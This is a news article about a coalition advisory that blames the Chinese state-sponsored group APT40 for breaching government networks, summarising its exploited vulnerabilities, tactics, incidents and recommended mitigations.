Chinese APT40 Hacking Group Blamed by Global Coalition for Hacking Government Networks

A coalition of nations, including the US, UK, Canada, Germany, Japan, New Zealand, and South Korea, has joined Australia in blaming Chinese state-sponsored hacking group APT40 for infiltrating government networks. This development follows the March 2024 sanctions against APT31 members, highlighting the persistent threat posed by Chinese advanced persistent threat (APT) actors.

Known by various names such as Bronze Mohawk, Gingham Typhoon, Kryptonite Panda, and Leviathan, APT40 has been repeatedly targeting Australian networks and those in the wider region. The coalition's advisory states, "APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing."

APT40 conducts regular reconnaissance operations, exploiting old and vulnerable devices. They are adept at quickly adopting exploits for new vulnerabilities, including those in widely used software like Atlassian Confluence (CVE-2021-26084), Log4J (CVE-2021-44228), and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). The advisory warns that APT40 is expected to continue using proof-of-concept (PoC) exploits for new high-profile vulnerabilities shortly after their public release.

Unlike many other threat actors, APT40 prefers to exploit vulnerable, internet-facing infrastructure for initial access rather than relying on phishing or other user interaction-based techniques. They exfiltrate credentials for follow-up operations and establish persistence early in the attack chain. The group has been known to compromise legacy small-office/home-office (SOHO) devices, using them as launch points for subsequent attacks that blend in with legitimate network traffic. This tactic is shared by other Chinese state-sponsored actors worldwide, posing a global threat.

In one notable incident, APT40 maintained access to an Australian organization’s network between July and September 2022. They established multiple access vectors, exfiltrated large amounts of data, and moved laterally within the network. In another case, the group compromised an organization's remote access login portal, exploiting a publicly disclosed remote code execution (RCE) flaw to exfiltrate several hundred unique username and password pairs.

To mitigate the risk of such attacks, organizations are advised to implement comprehensive logging capabilities, promptly patch all internet-accessible appliances, implement network segmentation, disable unused services, ports, and protocols, enable multi-factor authentication, and replace legacy equipment. Software manufacturers are urged to adopt Secure by Design principles to enhance the security of their products.

The coalition's advisory emphasizes the need for all organizations to review these recommendations to identify, prevent, and remediate APT40 intrusions. By adopting these measures, organizations can strengthen their defenses against the sophisticated techniques employed by APT40 and other state-sponsored threat actors.